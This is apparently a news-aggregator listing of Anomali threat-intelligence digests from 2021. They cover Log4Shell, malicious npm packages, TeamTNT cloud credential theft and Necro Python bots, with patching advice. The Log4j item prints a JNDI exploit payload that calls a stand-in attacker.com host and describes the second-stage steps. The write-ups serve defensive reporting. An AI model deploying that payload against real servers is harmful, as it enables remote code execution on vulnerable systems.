Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow |
Ransomware Malware Tool Vulnerability Threat Patching Guideline | APT 41 APT 38 APT 29 APT 28 APT 28 | |
|
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-06-08 15:00:00 | Anomali Cyber Watch: TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations, Necro Python Bots Adds New Tricks, US Seizes Domains Used by APT29 and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, APT29, FluBot, Necro Python, RoyalRoad, SharpPanda, TeaBot and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations
(published: June 4, 2021)
Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP.
Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts.
MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069
Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates
Necro Python Bots Adds New Tricks
(published: June 3, 2021)
Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms.
Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover.
MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219
Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig
New SkinnyBoy Ma |
Ransomware Malware Vulnerability Threat Patching Guideline | APT 29 APT 28 |
1
We have: 15 articles.
We have: 15 articles.
To see everything:
Our RSS (filtrered)
